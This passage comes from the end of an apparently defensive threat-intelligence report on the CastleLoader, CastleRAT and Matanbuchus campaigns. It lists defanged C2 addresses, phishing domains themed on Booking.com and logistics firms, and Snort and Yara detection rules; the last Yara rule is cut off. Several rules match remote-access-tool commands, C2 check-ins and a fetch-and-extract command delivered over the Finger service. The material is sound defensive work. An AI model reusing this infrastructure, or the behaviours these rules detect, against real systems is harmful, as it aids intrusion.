        <p>Insikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.</p>
        <h2>Appendix A: CastleLoader C2 Servers</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix B: Additional Infrastructure Likely Linked to CastleLoader</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix C: Logistics-Themed Infrastructure Used by TAG-160</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix D: Booking.com-Themed Domains Linked to TAG-161</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix E: Additional Infrastructure Linked to “Redirect and Email Manager” Tool</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside the IP Addresses that Hosted the C2 domains</h2>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix G: Booking.com-Themed Infrastructure Linked to Cluster 3</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>bioskbd[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-23</div>
            <div>2025-09-29</div>
          </div>
          <div>
            <div>blkiesf[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-25</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>boikfrs[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-22</div>
            <div>2025-09-29</div>
          </div>
          <div>
            <div>boiksal[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-04</div>
            <div>2025-09-10</div>
          </div>
          <div>
            <div>bookingnewprice109034[.]icu</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>bookingnewprice204167[.]icu</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-20</div>
          </div>
          <div>
            <div>guest-request16433[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guest-request44565494[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-05</div>
            <div>2025-09-07</div>
          </div>
          <div>
            <div>guest-request64533[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guest-request666543[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guest-request677653[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guest-update666532345[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>hotelroomprice1039375[.]icu</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>info-guest44567645[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-28</div>
            <div>2025-09-03</div>
          </div>
          <div>
            <div>info676345677[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>newmessage10294[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-09</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>request-info3444[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-15</div>
            <div>2025-09-21</div>
          </div>
          <div>
            <div>request-info4433345[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>request345553[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-15</div>
            <div>2025-09-22</div>
          </div>
          <div>
            <div>request44456776[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>update-gues3429[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-15</div>
            <div>2025-09-21</div>
          </div>
          <div>
            <div>update-guest4398317809[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-14</div>
            <div>2025-09-17</div>
          </div>
          <div>
            <div>update-info14546[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>update-info3458421[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-25</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>update-info4467[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>update-info4468765[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-25</div>
            <div>2025-09-03</div>
          </div>
          <div>
            <div>update-info539156[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-24</div>
            <div>2025-09-02</div>
          </div>
          <div>
            <div>update-info71556[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-28</div>
            <div>2025-09-03</div>
          </div>
          <div>
            <div>update-reques898665[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-21</div>
            <div>2025-09-02</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix H: Indicators of Compromise (IoCs)</h2>
        <div>
          <div>
            <div>
              <pre><code>CastleRAT C2 IP Addresses:
5[.]35[.]44[.]176
34[.]72[.]90[.]40
45[.]11[.]180[.]174
45[.]11[.]180[.]198
45[.]11[.]181[.]59
45[.]32[.]69[.]11
45[.]61[.]136[.]81
45[.]134[.]26[.]41
45[.]135[.]232[.]149
45[.]144[.]53[.]62
46[.]28[.]67[.]22
64[.]52[.]80[.]121
66[.]63[.]187[.]224
67[.]217[.]228[.]198
77[.]90[.]153[.]43
77[.]238[.]241[.]203
79[.]132[.]130[.]148
79[.]132[.]131[.]200
85[.]192[.]49[.]6
85[.]208[.]84[.]115
87[.]120[.]93[.]167
91[.]202[.]233[.]132
91[.]202[.]233[.]250
94[.]141[.]122[.]164
102[.]135[.]95[.]102
104[.]225[.]129[.]171
144[.]208[.]126[.]50
168[.]100[.]8[.]84
178[.]17[.]57[.]102
178[.]17[.]57[.]153
185[.]125[.]50[.]125
185[.]149[.]146[.]118
185[.]156[.]248[.]24
185[.]196[.]9[.]80
185[.]196[.]9[.]222
185[.]196[.]10[.]8
185[.]196[.]11[.]171
185[.]208[.]158[.]250
192[.]109[.]138[.]102
192[.]153[.]57[.]125
194[.]76[.]227[.]242
195[.]85[.]115[.]44
195[.]149[.]146[.]118
195[.]201[.]108[.]189
195[.]211[.]97[.]51

CastleRAT C2 Domains:
autryjones[.]com
gabesworld[.]com
justnewdmain[.]com
kakapupuneww[.]com
miteamss[.]com
programsbookss[.]com
tdbfvgwe456yt[.]com
treetankists[.]com

Steam Community URLs:
hxxps[://]steamcommunity[.]com/id/desdsfds34324y3g
hxxps[://]steamcommunity[.]com/id/fio34h8dsh3iufs
hxxps[://]steamcommunity[.]com/id/jeg238r7staf378s
hxxps[://]steamcommunity[.]com/id/krouvhsin34287f7h3
hxxps[://]steamcommunity[.]com/id/tfy5d6gohu8tgy687r7

CastleLoader C2 IP Addresses:
31[.]58[.]50[.]160
31[.]58[.]87[.]132
45[.]11[.]183[.]19
45[.]11[.]183[.]45
45[.]11[.]183[.]165
45[.]155[.]249[.]121
80[.]77[.]25[.]88
80[.]77[.]25[.]114
80[.]77[.]25[.]239
107[.]158[.]128[.]26
147[.]45[.]177[.]127
170[.]130[.]165[.]201
172[.]86[.]90[.]58
173[.]44[.]141[.]52
185[.]121[.]234[.]141

CastleLoader C2 Domains:
alafair[.]net
anotherproject[.]icu
bethschwier[.]com
campanyasoft[.]com
castlppwnd[.]com
donttouchme[.]life
donttouchthisisuseless[.]icu
doyoureallyseeme[.]icu
dpeformse[.]com
icantseeyou[.]icu
oldspicenotsogood[.]shop
rcpeformse[.]com
roject0[.]com
speatly[.]com
touchmeplease[.]icu
wereatwar[.]com

Additional Domains:
albafood[.]shop
albalk[.]lol
bdeskthebest[.]shop
bestproxysale[.]shop
bestvpninfo[.]shop
chessinthenight[.]lol
clgenetics[.]shop
docusign[.]homes
dubaialbafood[.]shop
easyadvicesforyou[.]shop
easyprintscreen[.]shop
funjobcollins[.]shop
nort-secure[.]shop
norton-secure[.]shop
notstablecoin[.]xyz
notusdt[.]lol
nvidblog[.]shop
nvldlainfoblog[.]shop
oldspicenotsogood[.]shop
starkforeveryone[.]lol
sweetdevices[.]lol
testdomain123123[.]shop
tradeviewdesktop[.]shop
tradlngview-desktop[.]biz
tradlngvlewdesktop[.]shop
tradview-desktop[.]shop
vipcinemade[.]shop
vipcinemadubai[.]shop
vipdubaicinema[.]shop

Cluster 1 (TAG-160) Logistics-Themed Domains:
cdlfreightlogistics[.]com
dperforms[.]info
englandloglstics[.]com
englanglogistlcs[.]com
hometownlogisticsllc[.]com
leemanlogisticsinc[.]com
loadplannig[.]com
loads[.]icu
loadsplanning[.]com
loadsschedule[.]com
loadstracking[.]com
loadstrucking[.]com
mcentireinc[.]com
mcloads[.]com
mlxfreightinc[.]com
mrlogsol[.]ca
pinaccletruckllc[.]com
rateconfirmations[.]com
redlightninglogistics[.]com
redlightninglogisticsinc[.]com
starshiplogisticsgroupllc[.]com
tenderloads[.]com
trucksscheduling[.]com

Cluster 1 (TAG-160) IP Addresses Hosting Logistics-Themed Domains:
74[.]119[.]239[.]234
78[.]153[.]155[.]131
162[.]215[.]230[.]96
162[.]215[.]230[.]150
162[.]215[.]241[.]46
162[.]215[.]241[.]215
162[.]251[.]80[.]108
185[.]236[.]20[.]154
192[.]124[.]178[.]74
199[.]79[.]62[.]141
204[.]11[.]58[.]80
207[.]174[.]212[.]141

Matanbuchus C2 IP Addresses:
185[.]39[.]19[.]164

Matanbuchus C2 Domains:
galaxioflow[.]com
mechiraz[.]com
nicewk[.]com
nimbusvaults[.]com

Cluster 2 (TAG-161) Booking.com-Themed Domains:
checkinastayverify[.]com
checkinistayverify[.]com
checkinstayverify[.]com
checkistayverify[.]com
checksstayverify[.]com
checkystayverify[.]com
confirmahotelastay[.]com
confirmahotelstay[.]com
confirmhotelestay[.]com
confirmhotelistay[.]com
confirmhotelystay[.]com
confirmstayon[.]com
confirmstayonline[.]com
confirmyhotelstay[.]com
guestaformahub[.]com
guestaformhub[.]com
guestaformsafe[.]com
guestaportalverify[.]com
guestaverifyportal[.]com
guestformahub[.]com
guestformasafe[.]com
guestformhub[.]com
guestformsafe[.]com
guestistayhotel[.]com
guestportalverify[.]com
gueststayhotel[.]com
guestverifyhub[.]com
guestverifylink[.]com
guestverifyportal[.]com
guestystayhotel[.]com
guesutastayhotel[.]com
guesytastayhotel[.]com
hoteliguestverify[.]com
hotelistayverify[.]com
hotelyguestverify[.]com
hotelystayverify[.]com
nedpihotel[.]com
pilolhotel[.]com
roomiverifaccess[.]com
roomverifaccess[.]com
roomverifiaccess[.]com
servicehotelonline[.]com
verifihubguest[.]com
verifyhubguest[.]com

Cluster 2 (TAG-161) IP Addresses Hosting Booking.com-Themed Domains:
77[.]83[.]207[.]55
185[.]39[.]19[.]180
185[.]39[.]19[.]181

Other Domains Linked to Cluster 2 (TAG-161):
cik-ed[.]com
cut-gv[.]com
dip-bo[.]com
dok-ol[.]com
dut-cd[.]com
eta-cd[.]com
eto-sa[.]com
fir-vp[.]com
for-es[.]com
gir-vc[.]com
gut-bk[.]com
her-op[.]com
ipk-sa[.]com
itp-ce[.]com
kil-it[.]com
kip-er[.]com
mac-ig[.]com
map-nv[.]com
ned-uj[.]com
otr-gl[.]com
pit-kp[.]com
rol-vd[.]com
site-bila[.]com
site-here[.]com
site-reto[.]com
site-tilo[.]com
site-wila[.]com
spu-cr[.]com
tam-cg[.]com
uke-sd[.]com
uki-fa[.]com
wal-ik[.]com
xut-uv[.]com
xyt-ko[.]com
ykl-vh[.]com
yt-ko[.]com
zit-fl[.]com

Proxy IP Addresses Linked to Cluster 2 (TAG-161):
109[.]104[.]153[.]29
109[.]104[.]153[.]100
109[.]104[.]153[.]193
109[.]104[.]154[.]67

Additional IP Addresses Linked to Phishing Email Management Tooling:
80[.]64[.]18[.]245
85[.]208[.]84[.]65
88[.]214[.]50[.]83
185[.]39[.]19[.]94

Cluster 3 Booking.com-Themed Domains:
bioskbd[.]com
blkiesf[.]com
boikfrs[.]com
boiksal[.]com
bookingnewprice109034[.]icu
bookingnewprice204167[.]icu
guest-request16433[.]com
guest-request44565494[.]com
guest-request64533[.]com
guest-request666543[.]com
guest-request677653[.]com
guest-update666532345[.]com
hotelroomprice1039375[.]icu
info-guest44567645[.]com
info676345677[.]com
justnewdmain[.]com
newmessage10294[.]com
programsbookss[.]com
request-info3444[.]com
request-info4433345[.]com
request345553[.]com
request44456776[.]com
update-gues3429[.]com
update-guest4398317809[.]com
update-info14546[.]com
update-info3458421[.]com
update-info4467[.]com
update-info4468765[.]com
update-info539156[.]com
update-info71556[.]com
update-reques898665[.]com

Cluster 3 IP Addresses Hosting Booking.com-Themed Domains:
178[.]17[.]57[.]103
192[.]109[.]138[.]102
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix I: Snort Rules for CastleLoader</h2>
        <div>
          <div>
            <div>
              <pre><code>alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Checkin"; flow:established,to_server; content:"GET"; http_method; urilen:82,norm; content:"|2F|service|2F|settings|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460302; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460303; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Stager Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; depth:18; fast_pattern; content:".bin"; http_uri; content:"GoogeBot"; http_user_agent; depth:8; isdataat:0,relative; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460304; rev:1; metadata:author MGUT, created_at 2025-08-12, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert tcp $EXTERNAL_NET 79 -&gt; $HOME_NET any (msg:"CastleLoader Malware Inbound Command Retrieval via Finger Service"; flow:established,to_client; content:"Login|3A 20|"; depth:7; content:"Plan|3A|"; distance:0; content:"%random%"; fast_pattern; distance:0; content:"|20|--tlsv1.2|20|-L|20|-o|20|"; distance:0; content:"|0D 0A|mkdir|20|"; distance:0; content:"|0D 0A|tar|20|"; distance:0; reference:url,https://tria.ge/251110-zcgvkstpck; classtype:trojan-activity; sid:52460334; rev:2; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix J: Snort Rules for CastleRAT</h2>
        <div>
          <div>
            <div>
              <pre><code>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|02 56 77 8E A5 83 D7 05 02 C2 1E D9 70 5A 47 E5 11 92 B5 5A|"; fast_pattern; depth:20; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460307; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|BF CF 04 82 45 DF 4F 09 55 5E 0B 15 9F E2 91 A0 68 51 1E 87|"; fast_pattern; depth:20; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460308; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|6B 13 5C 08 BD 49 59 75 79 62 4E EA 2F DE 57 F4 6E 08 8B 6B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250219-nsbsqazpep; classtype:trojan-activity; sid:52460309; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|56 EA 59 DB 6B DD 36 81 42 01 C6 84 DF 5A 6B E8 38 14 8D 07|"; fast_pattern; depth:20; reference:url,https://tria.ge/250505-wmbvjabk3t; classtype:trojan-activity; sid:52460310; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|A8 CF 1E 1D BA 27 49 FB 63 38 F4 52 A7 9C 39 CF 4A 85 E5 5B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460311; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|0F 0D F7 66 4C B2 D5 12 BA 55 CC BB 2E 1B F4 AD C0 E0 7C A2|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-rt355svtfs; classtype:trojan-activity; sid:52460312; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|74 6F D9 7F B5 48 F6 91 26 E0 16 5A 81 29 4F 35 21 6C 61 82|"; fast_pattern; depth:20; reference:url,https://tria.ge/250813-a7c3fadl7z; classtype:trojan-activity; sid:52460313; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|61 57 7C E8 EE BE 56 71 B3 98 F4 A6 87 E3 0C 39 50 0C 29 41|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460314; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|4D 58 29 58 84 15 1B 1D 2A D9 80 90 5C 36 1C A0 43 05 80 48|"; fast_pattern; depth:20; reference:url,https://tria.ge/250701-v6911aykv9; classtype:trojan-activity; sid:52460335; rev:1; metadata:author MGUT, created_at 2025-10-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT Python Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:19,norm; content:"|2F|line|2F 3F|fields|3D|16385"; http_uri; depth:19; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460315; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147457"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460316; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147505"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460317; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server; content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147489"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_header; depth:48; reference:url,https://tria.ge/251028-27bcds1nbk; classtype:trojan-activity; sid:52460333; rev:1; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix K: Snort Rules for Matanbuchus</h2>
        <div>
          <div>
            <div>
              <pre><code>alert udp $EXTERNAL_NET any -&gt; $HOME_NET any (msg:"Matanbuchus Loader Inbound DNS Tunneled Data ACK"; content:"|AA AA 85 80 00 01 00 01 00 00 00 00 01 30 14|"; fast_pattern; depth:15; content:"|10|"; distance:20; within:1; content:"|00 10 00 01 00 00 00 3C 00 03 02|ok"; distance:0; isdataat:!1,relative; reference:url,https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up; reference:url,https://tria.ge/250716-b5sksa1wgt; sid:52460327; rev:1; metadata:author MGUT, created_at 2025-09-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Matanbuchus Loader Malware Outbound C2 Communication"; flow:established,to_server; content:"POST|20|"; depth:5; content:"|2E|php"; distance:0; content:"1|0D 0A|User-Agent|3A 20|"; distance:0; content:"Host|3A 20|"; distance:0; content:"Content-Length|3A 20|"; distance:0; content:"Content-Type|3A 20|application|2F|x-www-form-urlencoded|0D 0A|Accept-Language|3A 20|"; distance:0; content:"|0D 0A 0D 0A|"; content:!"|26|"; distance:0; content:"|3D|ey"; fast_pattern; distance:0; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost[^\x0d]+\x0d\x0aContent\x2dLength[^\x0d]+\x0d\x0aContent\x2dType[^\x0d]+\x0d\x0aAccept\x2dLanguage[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://tria.ge/240328-t4ge8sbf65; classtype:bad-unknown; sid:52460167; rev:1; metadata:author MGUT, created_at 2024-03-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix L: Yara Rule for CastleLoader</h2>
        <div>
          <div>
            <div>
              <pre><code>rule MAL_CastleLoader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-06"
        description = "Detection of the CastleLoader malware executable"
        version = "1.0"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        hash = "1b6befc65b19a63b4131ce5bcc6e8c0552fe1e1d136ab94bc7d81b3924056156"
        hash = "202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04"
        hash = "25e0008aba82690e0f58c9d9fcfbc5d49820aa78d2f7bfcd0b85fb969180fc04"
        hash = "b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2"
        hash = "fb9de7448e9e30f717c171f1d1c90ac72828803a16ad385757aeecc853479d3c"
        hash = "6444f0e3f78254aef663837562d258a2236a77f810ee8d832de7d83e0fdd5783"
        malware = "CastleLoader"
        malware_id = "8RF9P9"
        category = "MALWARE"
    strings:
        $vmware_check = { 3D 56 4D 77 61 75 ?? 81 7D F8 72 65 56 4D 0F 85 ?? ?? ?? ?? 81 7D F4 77 61 72 65 }
        $api_hashing = { 0F BE 0C 1E 8B C2 F6 C3 01 75 0F C1 E8 03 0F AF C1 8B CA C1 E1 07 33 C1 }
        $stack_str_url = { C7 ?5 [1-4] 74 00 74 00 C7 ?5 [1-4] 69 00 6E 00 C7 ?5 [1-4] 67 00 73 00 }
        $mov_edx_apihash1 = { BA 44 A0 2D 39 } // CreateMutexW
        $mov_edx_apihash2 = { BA 2B C2 86 58 } // GetLastError
        $mov_edx_apihash3 = { BA 94 F9 86 F8 } // RtlAllocateHeap
        $mov_edx_apihash4 = { BA B2 48 70 60 } // ExitProcess
    condition:
        uint16(0) == 0x5A4D and all of them
}
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix M: Yara Rules for CastleRAT</h2>
        <div>
          <div>
            <div>
              <pre><code>rule MAL_CastleRAT_Python {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the python variant of CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "94dc0f696a46f3c225b0aa741fbd3b8997a92126d66d7bc7c9dd8097af0de52a"
        hash = "53775af67e9df206ed3f9c0a3756dbbc4968a77b1df164e9baddb51e61ac82df"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $cmd1 = "S_CONNECT" fullword
        $cmd2 = "S_COMMAND" fullword
        $cmd3 = "S_PING" fullword
        $cmd4 = "S_CMD" fullword
        $cmd5 = "S_DELETE" fullword
        $cmd6 = "S_POWERSHELL" fullword
        $cmd7 = "S_START_TERMINAL" fullword
        $cmd8 = "S_SESSION_MESSAGE" fullword
        $cmd9 = "S_UPLOAD" fullword
        $fun1 = "CheckElevation():" fullword
        $fun2 = "GetHWID("
        $fun3 = "GetOS("
        $fun4 = "GetIpGeo("
        $fun5 = "rc4createkeyA("
        $fun6 = "EncryptDecryptBufA("
        $fun7 = "RecvTimeout("
        $fun8 = "Send("
        $fun9 = "Connect("
        $fun10 = "ThreadPing("
        $fun11 = "ThreadRecvTerminal("
        $fun12 = "ThreadTerminalSession("
        $fun13 = "ThreadUploadFile("
        $fun14 = "SelfDelete()" fullword
    condition:
        filesize &lt; 50KB and
        7 of ($cmd*) and
        10 of ($fun*)
}

rule MAL_CastleRAT_C {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the C variant of CastleRAT malware"
        version = "2.0"
        reference = "https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75"
        hash = "e6bcdf375649a7cbf092fcab65a24d832d8725d833e422e28dfa634498b00928"
        hash = "67cf6d5332078ff021865d5fef6dc61e90b89bc411d8344754247ccd194ff65b"
        hash = "963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d"
